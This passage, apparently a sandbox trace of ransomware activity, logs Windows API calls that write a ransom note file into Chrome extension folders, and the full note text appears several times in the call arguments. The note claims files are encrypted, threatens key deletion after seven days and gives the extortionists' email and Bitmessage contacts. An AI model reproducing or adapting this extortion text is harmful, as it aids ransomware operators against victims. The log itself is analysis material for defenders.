D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.351] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.352] CloseHandle (hObject=0x294) returned 1 [0273.352] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0273.352] GetLastError () returned 0x2 [0273.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 